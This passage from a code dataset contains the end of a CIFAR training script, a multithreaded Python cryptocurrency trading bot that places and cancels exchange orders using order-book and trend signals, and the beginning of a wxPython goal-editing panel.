cum_loss.append(loss_i)\n cum_acc.append(acc_i)\n logger.log_scalar('accuracy', acc_i, step=i+1)\n logger.log_scalar('loss', loss_i, step=i+1)\n\n epoch_time = time.time() - start_time\n print(\"{:10}|{:10.5f}|{:10.5f}|{:10.5f}\".format(epoch, onp.mean(cum_loss),\n onp.mean(cum_acc),\n epoch_time)) \n","sub_path":"learn_cifar.py","file_name":"learn_cifar.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"407831660","text":"from concurrent.futures import ThreadPoolExecutor\nimport time,datetime\nimport collections\nimport sys, os, traceback\nimport logging\nfrom abc import ABC, abstractmethod\n\nsys.path.append('../codebase')\nfrom helpText import errorTexts, statusTexts\nfrom util import createLogger\nfrom utilTrade import getKline\nfrom utilException import catchExceptionDecorator, catchMethodExceptionDecorator\n\nglobalTrendTrading = False\n\nclass SlarkBase(ABC):\n\tdef __init__(self, exch, logLevel, symbol, cfg, name):\n\t\tself.logger = createLogger('{}{}'.format(name, symbol[0:3]), logLevel)\n\t\tself.symbol = symbol\n\t\tself.name = name\n\t\tself.createExch(exch)\n\t\tself.initializeCfg(cfg) # call the derived methods\n\t\tself.initialize()\n\t\tself.logger.info('{} instance initialized successfully.'.format(self.name))\n\n\t@abstractmethod\n\tdef createExch(self, exch):\n\t\tpass\n\t@abstractmethod\n\tdef initializeCfg(self, cfg):\n\t\tpass\n\t@abstractmethod\n\tdef initialize(self):\n\t\tpass\n\nclass SlarkBalancePosition(SlarkBase):\n\tdef __init__(self, exch, logger, symbol, cfg, name):\n\t\tsuper(SlarkBalancePosition, self).__init__(exch, logger, symbol, cfg, name)\n\n\tdef createExch(self, exch):\n\t\tself.traderBalance\t= exch.cnExchTrade()\n\t\tself.account \t\t\t= exch.cnExchAccount()\n\t\tself.marketData \t\t= exch.cnExchMarketData()\n\t\tself.logger.info('SlarkBalancePosition traderBalance, account and marketData, have been initialized successfully.')\n\n\tdef initializeCfg(self, cfg):\n\t\tself.cfgLogOnly = ('yes' == cfg.get(self.symbol, 'logonly'))\n\t\tself.logger.info('SlarkBalancePosition cfg: logOnlyMode={}'.format('ON' if self.cfgLogOnly else 'OFF'))\n\n\tdef initialize(self):\n\t\tself.__updateOrderbook()\n\t\tself.__updateUserInfo()\n\n\tdef __updateOrderbook(self):\n\t\torderBook = self.marketData.depth(symbol = self.symbol, size = 15)\n\t\tself.bids = orderBook['bids']\n\t\tself.asks = orderBook['asks']\n\t\tself.logger.info('SlarkBalancePosition Update order book\\n\\\n\t\t\t\t\t\t\tnew bid prices: {}\\n\\\n\t\t\t\t\t\t\tnew ask prices: {}'.format(self.bids, self.asks))\n\n\tdef __updateUserInfo(self):\n\t\tuserinfo = self.account.userinfo()['info']['funds']\n\t\tfree = userinfo['free']\n\t\tself.coin = free[self.symbol[0:3]] # only for coins, not for contracts\n\t\tself.cny = free['cny']\n\t\tlatestPrice = (self.bids[0][0] + self.asks[0][0]) / 2 * 0.7 + \\\n\t\t\t\t\t (self.bids[1][0] + self.asks[1][0]) / 2 * 0.2 + \\\n\t\t\t\t\t (self.bids[2][0] + self.asks[2][0]) / 2 * 0.1\n\t\tself.balanceRatio = self.coin * latestPrice / (self.coin * latestPrice + self.cny)\n\t\tself.logger.info('SlarkBalancePosition Update user info: {} {}, CNY {}, latest balanceRatio: {}'.format(\n\t\t\tself.symbol[0:3].upper(), self.coin, self.cny, self.balanceRatio))\n\n\tdef trade(self):\n\t\t@catchMethodExceptionDecorator\n\t\tdef tradeHelper(self):\n\t\t\tglobal globalTrendTrading\n\t\t\tif globalTrendTrading:\n\t\t\t\ttime.sleep(30) # decrease the balance 
frequency\n\t\t\t\tself.logger.info('SlarkBalancePosition In trend trade state. Sleep 30s.')\n\t\t\t\treturn\n\n\t\t\tpreBalanceTime = time.time()\n\t\t\ttradeOrderIDs = '' # comma-separated string of order ids to cancel\n\t\t\tif self.balanceRatio < 0.47:\n\t\t\t\ttime.sleep(10)\n\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\tself.logger.info('SlarkBalancePosition balanceRatio {}'.format(self.balanceRatio))\n\t\t\t\t\ttime.sleep(60)\n\t\t\t\t\treturn\n\t\t\t\torders = self.traderBalance.batch_trade(symbol = self.symbol, type = 'buy', orders_data = \n\t\t\t\t\t[{'price': self.bids[0][0] + 0.00, 'amount': (100 / (self.bids[0][0] + 0.00)), 'type':'buy'},\n\t\t\t\t\t {'price': self.bids[0][0] + 0.01, 'amount': (100 / (self.bids[0][0] + 0.01)), 'type':'buy'},\n\t\t\t\t\t {'price': self.bids[0][0] + 0.02, 'amount': (100 / (self.bids[0][0] + 0.02)), 'type':'buy'}])\n\t\t\t\torders = orders['order_info']\n\t\t\t\tfor i,order in enumerate(orders):\n\t\t\t\t\tif order['order_id'] == '-1':\n\t\t\t\t\t\tself.logger.error(\"SlarkBalancePosition error {} in batch_trade, {}th buy order,\\n\\\n\t\t\t\t\t\t\t\t\t\t\t Reason: {}\".format(order['error_code'], i, errorTexts[order['error_code']]))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttradeOrderIDs += order['order_id'] + ',' # str has no append(); concatenate instead\n\t\t\t\tself.logger.info('SlarkBalancePosition buy traded IDs: {}'.format(orders))\n\t\t\telif self.balanceRatio > 0.53:\n\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\tself.logger.info('SlarkBalancePosition balanceRatio {}'.format(self.balanceRatio))\n\t\t\t\t\ttime.sleep(60)\n\t\t\t\t\treturn\n\t\t\t\torders = self.traderBalance.batch_trade(symbol = self.symbol, type = 'sell', orders_data = \n\t\t\t\t\t[{'price': self.asks[0][0] - 0.00, 'amount': (100 / (self.asks[0][0] - 0.00)), 'type':'sell'},\n\t\t\t\t\t {'price': self.asks[0][0] - 0.01, 'amount': (100 / (self.asks[0][0] - 0.01)), 'type':'sell'},\n\t\t\t\t\t {'price': self.asks[0][0] - 0.02, 'amount': (100 / (self.asks[0][0] - 0.02)), 'type':'sell'}])\n\t\t\t\torders = orders['order_info']\n\t\t\t\tfor i,order in enumerate(orders):\n\t\t\t\t\tif order['order_id'] == '-1':\n\t\t\t\t\t\tself.logger.error(\"SlarkBalancePosition error_code {} in batch_trade, {}th sell order,\\n\\\n\t\t\t\t\t\t\t\t\t\t\t Reason: {}\".format(order['error_code'], i, errorTexts[order['error_code']]))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttradeOrderIDs += order['order_id'] + ',' # str has no append(); concatenate instead\n\t\t\t\tself.logger.info('SlarkBalancePosition sell traded IDs: {}'.format(orders))\n\t\t\tself.__updateUserInfo()\n\t\t\tself.__updateOrderbook()\n\n\t\t\tif tradeOrderIDs:\n\t\t\t\ttime.sleep(0.4)\n\t\t\t\tcancelResult = self.traderBalance.cancel_order(symbol = self.symbol, order_id = tradeOrderIDs[:-1]) # [:-1] is to delete ','\n\t\t\t\tif 'error' in cancelResult:\n\t\t\t\t\tself.logger.error('SlarkBalancePosition order {} cancel fail in balance trade.'.format(cancelResult['error']))\n\t\t\twhile time.time() - preBalanceTime < 1:\n\t\t\t\ttime.sleep(0.005)\n\t\twhile True:\n\t\t\ttradeHelper(self)\n\n\nclass SlarkCancelLegacy(SlarkBase):\n\tdef __init__(self, exch, logger, symbol, cfg, name):\n\t\tsuper(SlarkCancelLegacy, self).__init__(exch, logger, symbol, cfg, name)\n\tdef createExch(self, exch):\n\t\tself.account \t\t\t\t= exch.cnExchAccount()\n\t\tself.traderBalance\t= exch.cnExchTrade()\n\t\tself.logger.info('SlarkBalancePosition traderBalance and account have been initialized successfully.')\n\tdef initializeCfg(self, cfg):\n\t\tself.cfgLogOnly\t\t\t= ('yes' == cfg.get(self.symbol, 'logonly'))\n\t\tself.logger.info('{} cfg: logOnlyMode={}'.format(self.name, 'ON' if self.cfgLogOnly else 
'OFF'))\n\tdef initialize(self):\n\t\tpass\n\n\tdef trade(self):\n\t\t@catchMethodExceptionDecorator\n\t\tdef tradeHelper(self):\n\t\t\ttime.sleep(60)\n\t\t\torder_info = self.account.order_info(symbol = self.symbol, order_id = -1)\n\t\t\t# trivialException\n\t\t\t#self.logger.info('SlarkCancelLegacy order_info {}'.format(order_info))\n\t\t\topenOrders = order_info['orders']\n\t\t\tif not openOrders:\n\t\t\t\tself.logger.info('SlarkCancelLegacy no open orders')\n\t\t\telse:\n\t\t\t\tself.logger.info('SlarkCancelLegacy openOrders {}'.format(openOrders))\n\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\tself.logger.info('SlarkCancelLegacy is in logOnlyMode. Do not cancel any legacy orders.')\n\t\t\t\t\treturn\n\t\t\t\tcount = 0\n\t\t\t\tfor openOrder in openOrders:\n\t\t\t\t\tif openOrder['create_date'] / 1000 - time.time() < -10:\n\t\t\t\t\t\tresult = self.traderBalance.cancel_order(symbol = self.symbol, order_id = openOrder['order_id'])\n\t\t\t\t\t\tself.logger.info('SlarkCancelLegacy cancel order {} result:{}'.format(openOrder['order_id'], str(result)))\n\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\tif 20 == count:\n\t\t\t\t\t\t\ttime.sleep(0.9) # frequency limit, 20 cancel / 2 s\n\t\t\t\t\t\t\tcount = 0\n\t\twhile True:\n\t\t\ttradeHelper(self)\n\nclass SlarkTrend(SlarkBase):\n\tdef __init__(self, exch, logger, symbol, cfg, name):\n\t\tsuper(SlarkTrend, self).__init__(exch, logger, symbol, cfg, name)\n\tdef initialize(self):\n\t\tself.lastTradedId = 9070000 # historical traded id\n\t\tself.vol = 0\n\t\tself.__updateTrades()\n\t\tprice = self.trades[-1]['price']\n\t\tself.prices = collections.deque(self.cfgPriceLen * [price], maxlen = self.cfgPriceLen)\n\t\tself.__updateOrderbook()\n\t\tself.__updateUserInfo()\n\t\tself.numTick = 0\n\t\tself.bull = False\n\t\tself.bear = False\n\t\tself.tradeAmount = 0\n\t\tself.currentPrice = 0\n\t\tself.burstPrice = 0\n\t\tself.state = 'NULL'\n\n\tdef createExch(self, exch):\n\t\tself.traderTrend\t\t= exch.cnExchTrade()\n\t\tself.account \t\t\t\t= exch.cnExchAccount()\n\t\tself.marketData \t\t= exch.cnExchMarketData()\n\t\tself.logger.info('SlarkTrend exchanges traderTrend, account and marketData, have been initialized successfully.')\n\n\tdef initializeCfg(self, cfg):\n\t\tself.cfgInterval\t= float(cfg.get(self.symbol, 'interval'))\n\t\tself.cfgPct\t\t \t\t= float(cfg.get(self.symbol, 'pct'))\n\t\tself.cfgVol \t \t\t= float(cfg.get(self.symbol, 'vol'))\n\t\tself.cfgPriceLen\t= int(cfg.get(self.symbol, 'pricelen'))\n\t\tself.cfgLogOnly\t\t\t= ('yes' == cfg.get(self.symbol, 'logonly'))\n\t\tself.lowerAmountLimit = float(cfg.get(self.symbol, 'lowerAmountLimit'))\n\t\tself.logger.info('SlarkTrend Config initialize:\\n\\\n\t\t\t\t\t\t trend trade time interval: {}s\\n\\\n\t\t\t\t\t\t burst price spread percentage: {}\\n\\\n\t\t\t\t\t\t burst volume: {} {}\\n\\\n\t\t\t\t\t\t logOnly: {}\\n\\\n\t\t\t\t\t\t lowerAmountLimit: {}'.format(\n\t\t\t\t\t\t self.cfgInterval, self.cfgPct, self.cfgVol, self.symbol[0:3].upper(), \n\t\t\t\t\t\t 'ON' if self.cfgLogOnly else 'OFF', self.lowerAmountLimit))\n\t\tself.logger.info('SlarkTrend config initialized successfully.')\n\n\tdef __updateTrades(self):\n\t\t\"\"\"\n\t\tget initial price from self.trades to initialize self.__prices, self.vol to compare market volume and config volume\n\t\t@attr trades: trades[-1] is the latest trade\n\t\t@type list of dicts: {amount:0.03, date:1498879798, date_ms:1498879798000, price:17778.50, tid:7575280178, type:buy}\n\n\t\t@attr vol: update in every call\n\t\t@type vol: long\n\n\t\t@attr lastTradedId: 
udpate in every call\n\t\t@type lastTradedId: long\n\t\t\"\"\"\n\t\tself.trades = self.marketData.trades(self.symbol, self.lastTradedId) # 想清楚返回多少trades 需要多少用来计算vol\n\t\tif self.trades:\n\t\t\tself.vol = 0.7 * self.vol + 0.3 * sum([it['amount'] for it in self.trades])\n\t\t\tself.lastTradedId = self.trades[-1]['tid']\n\t\t#self.logger.info('SlarkTrend Update trades\\n\\\n\t\t#\t\t\t\t\tnew vol: {}, last trades ID: {}'.format(self.vol, self.lastTradedId))\n \n\tdef __updateOrderbook(self):\n\t\t\"\"\"\n\t\tPrices is the time value sequence. Control the frequency! Or most slots are repeat!\n\t\t\"\"\"\n\t\torderBook = self.marketData.depth(symbol = self.symbol, size = 15)\n\t\tself.bids = orderBook['bids']\n\t\tself.asks = orderBook['asks']\n\t\tself.bidPrice = self.bids[0][0] * 0.618 + self.asks[0][0] * 0.382 + 0.01\n\t\tself.askPrice = self.bids[0][0] * 0.382 + self.asks[0][0] * 0.618 - 0.01\n\t\tself.prices.append(\n\t\t\t(self.bids[0][0] + self.asks[0][0]) / 2 * 0.7 +\n\t\t\t(self.bids[1][0] + self.asks[1][0]) / 2 * 0.2 +\n\t\t\t(self.bids[2][0] + self.asks[2][0]) / 2 * 0.1)\n\t\t#self.logger.info('SlarkTrend Update order book\\n\\\n\t\t#\t\t\t\t new bid price: {}, new ask price: {}\\n\\\n\t\t#\t\t\t\t prices: {}'.format(self.bidPrice, self.askPrice, self.prices))\n\n\tdef __updateUserInfo(self):\n\t\tself.userinfo = self.account.userinfo()['info']['funds']\n\t\tfree = self.userinfo['free']\n\t\tself.coin = free[self.symbol[0:3]] # only for coins, not for contracts\n\t\tself.cny = free['cny']\n\t\tself.balanceRatio = self.coin * self.prices[-1] / (self.coin * self.prices[-1] + self.cny)\n\t\t#self.logger.info('SlarkTrend Update user info: {} {}, CNY {}, latest balanceRatio: {}'.format(\n\t\t#\tself.symbol[0:3].upper(), self.coin, self.cny, self.balanceRatio))\n\n\tdef generateSignal(self):\n\t\t@catchMethodExceptionDecorator\n\t\tdef generateSignalHelper(self, timestamp0, timestamp1, minutes):\n\t\t\t#while time.time() - timestamp0 < self.cfgInterval:\n\t\t\twhile time.time() - timestamp0 < 1:\n\t\t\t\ttime.sleep(0.1)\n\t\t\ttimestamp1 = timestamp0\n\t\t\ttimestamp0 = time.time()\n\n\t\t\tself.__updateTrades()\n\t\t\tself.__updateOrderbook()\n\t\t\t#self.logger.info('SlarkTrend {} - {}, price: {}, net: {}, total: {}, balanceRatio: {} = {} {} / {}CNY, vol: {}'.format(\n\t\t\t#\t\t\tdatetime.datetime.fromtimestamp(timestamp1).strftime('%Y%m%d %H:%M:%S'),\n\t\t\t#\t\t\tdatetime.datetime.fromtimestamp(timestamp0).strftime('%Y%m%d %H:%M:%S'),\n\t\t\t#\t\t\tself.prices[-1],\n\t\t\t#\t\t\tself.userinfo['asset']['net'],\n\t\t\t#\t\t\tself.userinfo['asset']['total'],\n\t\t\t#\t\t\tself.balanceRatio,\n\t\t\t#\t\t\tself.coin,\n\t\t\t#\t\t\tself.symbol[0:3].upper(),\n\t\t\t#\t\t\tself.cny,\n\t\t\t#\t\t\tself.vol\n\t\t\t#\t\t\t))\n\t\t\tself.currentPrice = self.prices[-1]\n\t\t\t#self.burstPrice = self.currentPrice * self.cfgPct\n\t\t\tself.burstPrice = 0\n\t\t\tself.bull = False\n\t\t\tself.bear = False\n\t\t\tself.state = 'NULL'\n\t\t\tself.tradeAmount = 0\n\n\t\t\tidx = -1\n\t\t\twhile idx + self.cfgPriceLen > 0 and self.currentPrice == self.prices[idx]:\n\t\t\t\tidx -= 1\n\t\t\t# self.prices is dummy repeated\n\t\t\tif idx + self.cfgPriceLen == 0:\n\t\t\t\tself.logger.critical('SIGNAL __prices is dummy repeated')\n\t\t\t\treturn\n\t\t\t#self.logger.info('SIGNAL __prices {}'.format(list(self.prices)[0:idx]))\n\t\t\tif self.numTick > 2 and (self.currentPrice - max(list(self.prices)[0:idx]) > self.burstPrice or \n\t\t\t\t\t\t\t\t(idx > 1 and self.currentPrice - max(list(self.prices)[0:idx-1]) > 
self.burstPrice and \n\t\t\t\t\t\t\t\t self.currentPrice > self.prices[idx - 1])):\n\t\t\t\ttmpKline = self.marketData.kline(self.symbol, size= 2)\n\t\t\t\tif tmpKline[0][4] < tmpKline[1][4]:\n\t\t\t\t\tself.bull = True\n\t\t\t\t\tself.state = 'BULL'\n\t\t\t\t\tself.tradeAmount = self.cny / self.bidPrice * 0.99\n\t\t\t\t\tif minutes != datetime.datetime.now().minute:\n\t\t\t\t\t\tminutes = datetime.datetime.now().minute\n\t\t\t\t\t\tself.logger.info('numTick {}, currentPrice {}, prices {}, preK {}, nowK {}'.format(\n\t\t\t\t\t\t\tself.numTick, self.currentPrice, list(self.prices), tmpKline[0][4], tmpKline[1][4]))\n\t\t\t\t\t\tself.logger.info('SIGNAL BULL {}{} {}. State is {} now.'.format(\n\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), list(self.prices)[0:idx], self.state))\n\n\t\t\tif self.numTick > 2 and (self.currentPrice - min(list(self.prices)[0:idx]) < -self.burstPrice or \n\t\t\t\t\t\t\t\t(self.currentPrice - min(list(self.prices)[0:idx]) < -self.burstPrice and \n\t\t\t\t\t\t\t\t self.currentPrice < self.prices[idx - 1])):\n\t\t\t\ttmpKline = self.marketData.kline(self.symbol, size= 2)\n\t\t\t\tif tmpKline[0][4] > tmpKline[1][4]:\n\t\t\t\t\tself.bear = True\n\t\t\t\t\tself.state = 'BEAR'\n\t\t\t\t\tself.tradeAmount = self.coin\n\t\t\t\t\tif minutes != datetime.datetime.now().minute:\n\t\t\t\t\t\tminutes = datetime.datetime.now().minute\n\t\t\t\t\t\tself.logger.info('numTick {}, currentPrice {}, prices {}, nowK {}, preK {}'.format(\n\t\t\t\t\t\t\tself.numTick, self.currentPrice, list(self.prices), tmpKline[0][4], tmpKline[1][4]))\n\t\t\t\t\t\tself.logger.info('SIGNAL BEAR {}{} {}. State is {} now.'.format(\n\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), list(self.prices)[0:idx], self.state))\n\t\t\tself.numTick += 1\n\t\t### End of generateSignalHelper() ###\n\t\tglobalTrendTrading = False\n\t\ttimestamp1 = time.time()\n\t\ttimestamp0 = time.time()\n\t\tself.numTick = 0\n\t\tminutes = 0\n\t\twhile True:\n\t\t\tgenerateSignalHelper(self, timestamp0, timestamp1, minutes)\n\t\t\n\n\tdef trade(self):\n\t\t@catchMethodExceptionDecorator\n\t\tdef tradeHelper(self, minutes):\n\t\t\tif self.vol < self.cfgVol:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.tradeAmount *= self.vol / self.cfgVol\n\t\t\tif self.numTick < 5: \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.tradeAmount *= 0.8\n\t\t\tif self.numTick < 10: \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.tradeAmount *= 0.8\n\t\t\tif self.bull and self.currentPrice < max(self.prices): \t\t\t\t\t\t\t\t\tself.tradeAmount *= 0.9\n\t\t\tif self.bear and self.currentPrice > min(self.prices): \t\t\t\t\t\t\t\t\tself.tradeAmount *= 0.9\n\t\t\t#if abs(self.currentPrice - list(self.prices)[idx - 1]) > self.burstPrice * 2: self.tradeAmount *= 0.9\n\t\t\t#if abs(self.currentPrice - list(self.prices)[idx - 1]) > self.burstPrice * 3: self.tradeAmount *= 0.9\n\t\t\t#if abs(self.currentPrice - list(self.prices)[idx - 1]) > self.burstPrice * 4: self.tradeAmount *= 0.9\n\t\t\tif abs(self.asks[0][0] - self.bids[0][0]) > self.burstPrice * 2:\t\t\t\tself.tradeAmount *= 0.9\n\t\t\tif abs(self.asks[0][0] - self.bids[0][0]) > self.burstPrice * 3:\t\t\t\tself.tradeAmount *= 0.9\n\t\t\tif abs(self.asks[0][0] - self.bids[0][0]) > self.burstPrice * 4:\t\t\t\tself.tradeAmount *= 0.9\n\t\t\t#self.logger.info('TRADE self.tradeAmount updated to {}'.format(self.tradeAmount))\n\t\t\tif self.tradeAmount >= self.lowerAmountLimit:\n\t\t\t\t#tradePrice = self.bidPrice if self.bull else self.askPrice\n\t\t\t\ttradePrice = 
(self.prices[-1] - 1) if self.bull else (self.prices[-1] + 1)\n\t\t\t\t#self.logger.info('TRADE sets tradePrice {} since prices[-5:] are {}'.format(tradePrice, list(self.prices)[-5:]))\n\t\t\t\t#self.logger.info('TRADE tradePrice updated to {}'.format(tradePrice))\n\t\t\t\tglobalTrendTrading = True\n\t\t\t\twhile self.tradeAmount >= self.lowerAmountLimit:\n\t\t\t\t\tif self.bull:\n\t\t\t\t\t\tif self.state == 'BEAR':\n\t\t\t\t\t\t\tself.logger.info('TRADE state flip BULL -> BEAR, trade thread will stop BUY and start to SELL.')\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\t\t\t\tif minutes != datetime.datetime.now().minute:\n\t\t\t\t\t\t\t\t\tminutes = datetime.datetime.now().minute\n\t\t\t\t\t\t\t\t\tself.logger.info('TRADE BUY {} {} at {}. Since in logOnlyMode, buy nothing.'.format(\n\t\t\t\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), tradePrice))\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\ttradeInfo = self.traderTrend.trade(symbol = self.symbol, type = 'buy', price = tradePrice, amount = self.tradeAmount)\n\t\t\t\t\t\t\torderID = tradeInfo['order_id']\n\t\t\t\t\t\t\tself.logger.info(tradeInfo)\n\t\t\t\t\t\t\tself.logger.info('TRADE BUY {} {} at {}, orderID: {}'.format(\n\t\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), tradePrice, orderID))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.state == 'BULL':\n\t\t\t\t\t\t\tself.logger.info('TRADE state flip BEAR -> BULL, trade thread will stop SELL and start to BUY.')\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\t\t\t\tif minutes != datetime.datetime.now().minute:\n\t\t\t\t\t\t\t\t\tminutes = datetime.datetime.now().minute\n\t\t\t\t\t\t\t\t\tself.logger.info('TRADE SELL {} {} at {}. Since in logOnlyMode, sell nothing.'.format(\n\t\t\t\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), tradePrice))\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\ttradeInfo = self.traderTrend.trade(symbol = self.symbol, type = 'sell', price = tradePrice, amount = self.tradeAmount)\n\t\t\t\t\t\t\torderID = tradeInfo['order_id']\n\t\t\t\t\t\t\tself.logger.info(tradeInfo)\n\t\t\t\t\t\t\tself.logger.info('TRADE SELL {} {} at {}, orderID: {}'.format(\n\t\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), tradePrice, orderID))\n\n\t\t\t\t\ttime.sleep(0.2)\n\t\t\t\t\tself.traderTrend.cancel_order(symbol = self.symbol, order_id = orderID)\n\n\t\t\t\t\torder = None\n\t\t\t\t\twhile order == None or order['status'] == 4:\n\t\t\t\t\t\torder = self.account.order_info(symbol = self.symbol, order_id = orderID)['orders'][0]\n\t\t\t\t\t\tself.logger.info('TRADE {} status {}'.format(orderID, statusTexts[order['status']]))\n\n\t\t\t\t\tself.logger.info('TRADE TRADING: {} at price {}, amount: {}, dealamout: {}'.format(\n\t\t\t\t\t\t\t\t\t 'buy' if self.bull else 'sell',\n\t\t\t\t\t\t\t\t\t tradePrice,\n\t\t\t\t\t\t\t\t\t self.tradeAmount,\n\t\t\t\t\t\t\t\t\t order['deal_amount']\n\t\t\t\t\t\t\t\t\t ))\n\t\t\t\t\tself.tradeAmount -= order['deal_amount']\n\t\t\t\t\tif self.tradeAmount > self.lowerAmountLimit:\n\t\t\t\t\t\tself.tradeAmount -= 0.01\n\t\t\t\t\t\tself.tradeAmount *= 0.98\n\n\t\t\t\t\tif order['status'] == -1:\n\t\t\t\t\t\tself.updateOrderbook()\n\t\t\t\t\t\twhile self.bull and self.bidPrice - tradePrice > 1:\n\t\t\t\t\t\t\tself.tradeAmount *= 0.99\n\t\t\t\t\t\t\ttradePrice += 1\n\t\t\t\t\t\twhile self.bear and self.askPrice - tradePrice < -1:\n\t\t\t\t\t\t\tself.tradeAmount *= 0.99\n\t\t\t\t\t\t\ttradePrice -= 1\n\t\t\t\tself.numTick = 0 # new trade is start\n\t\t### End of 
tradeHelper() ###\n\t\tminutes = 0\n\t\twhile True:\n\t\t\tif self.bull or self.bear:\n\t\t\t\ttradeHelper(self, minutes)\n\nclass Slark:\n\tdef trade(exch, symbol, cfg):\n\t\tslarkCancelLegacy \t= SlarkCancelLegacy(exch, logging.INFO, symbol, cfg, 'SlarkCancelLegacy')\n\t\tslarkTrend \t\t\t\t\t= SlarkTrend(exch, logging.INFO, symbol, cfg, 'SlarkTrend')\n\t\tslarkBalancePosition= SlarkBalancePosition(exch, logging.INFO, symbol, cfg, 'SlarkBalancePosition')\n\t\ttry:\n\t\t\t#with ThreadPoolExecutor(max_workers=3) as executor:\n\t\t\t#\texecutor.submit(slarkTrend.trade)\n\t\t\t#\texecutor.submit(slarkBalancePosition.trade)\n\t\t\t#\texecutor.submit(slarkCancelLegacy.trade)\n\t\t\twith ThreadPoolExecutor(max_workers=2) as executor:\n\t\t\t\t#executor.submit(slarkCancelLegacy.trade)\n\t\t\t\texecutor.submit(slarkTrend.trade)\n\t\t\t\texecutor.submit(slarkTrend.generateSignal)\n\t\texcept Exception as e:\n\t\t\tlogger = createLogger('Slark', logging.INFO)\n\t\t\tlogger.critical(e)\n\t\t\tlogger.critical(traceback.format_exc())\n\t\t\tlogger.critical('status')\n\t\t\tinsts = [slarkBalancePosition, slarkCancelLegacy, slarkTrend]\n\t\t\tfor inst in insts:\n\t\t\t\tfor item in inst.__dict__.items():\n\t\t\t\t\tinst.logger.critical('self.%s: %s'%(item[0], str(item[1])))\n\t\t\n","sub_path":"btcTradingSystem/OKCoin/Code/SlarkMultithreadInstance/1theFirstTradedVersion/slark.py","file_name":"slark.py","file_ext":"py","file_size_in_byte":19903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"615334032","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nfrom DimensionListCtrl import DimensionListCtrl\nfrom GoalPage import GoalPage\nfrom ConcernAssociationListCtrl import ConcernAssociationListCtrl\n\nclass SummaryPage(wx.Panel):\n def __init__(self,parent,refiningGoal):\n wx.Panel.__init__(self,parent,armid.GOAL_PANELSUMMARY_ID)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n topRowSizer = wx.BoxSizer(wx.HORIZONTAL)\n topSizer.Add(topRowSizer,0,wx.EXPAND)\n\n lblBox = wx.StaticBox(self,-1,'Label')\n lblBoxSizer = wx.StaticBoxSizer(lblBox,wx.VERTICAL)\n topRowSizer.Add(lblBoxSizer,0,wx.EXPAND)\n self.labelCtrl = wx.TextCtrl(self,armid.GOAL_TEXTLABEL_ID,\"\",pos=wx.DefaultPosition,size=wx.Size(150,30),style=wx.TE_READONLY)\n self.labelCtrl.Disable()\n lblBoxSizer.Add(self.labelCtrl,1,wx.EXPAND)\n\n catBox = wx.StaticBox(self,-1,'Category')\n catBoxSizer = wx.StaticBoxSizer(catBox,wx.VERTICAL)\n topRowSizer.Add(catBoxSizer,1,wx.EXPAND)\n\n\n catList = ['Achieve','Maintain','Avoid','Improve','Increase','Maximise','Minimise']\n self.categoryCtrl = wx.ComboBox(self,armid.GOAL_COMBOCATEGORY_ID,choices=catList,size=wx.DefaultSize,style= wx.CB_READONLY)\n catBoxSizer.Add(self.categoryCtrl,1,wx.EXPAND)\n\n priBox = wx.StaticBox(self,-1,'Priority')\n priBoxSizer = wx.StaticBoxSizer(priBox,wx.VERTICAL)\n topSizer.Add(priBoxSizer,0,wx.EXPAND)\n priList = ['Low','Medium','High']\n self.priorityCtrl = wx.ComboBox(self,armid.GOAL_COMBOPRIORITY_ID,choices=priList,size=wx.DefaultSize,style= wx.CB_READONLY)\n priBoxSizer.Add(self.priorityCtrl,1,wx.EXPAND)\n\n defBox = wx.StaticBox(self,-1,'Definition')\n defBoxSizer = wx.StaticBoxSizer(defBox,wx.VERTICAL)\n topSizer.Add(defBoxSizer,1,wx.EXPAND)\n self.definitionCtrl = wx.TextCtrl(self,armid.GOAL_TEXTDEFINITION_ID,'',style= wx.TE_MULTILINE)\n defBoxSizer.Add(self.definitionCtrl,1,wx.EXPAND)\n\n if (refiningGoal == True):\n ctBox = wx.StaticBox(self,-1,'Contribution Type')\n ctBoxSizer = wx.StaticBoxSizer(ctBox,wx.HORIZONTAL)\n topSizer.Add(ctBoxSizer,0,wx.EXPAND)\n self.ctCtrl = wx.ComboBox(self,armid.GOAL_COMBOCONTRIBUTIONTYPE_ID,choices=['Operationalises','Obstructs'],size=wx.DefaultSize,style=wx.CB_READONLY)\n self.ctCtrl.SetSelection(0)\n 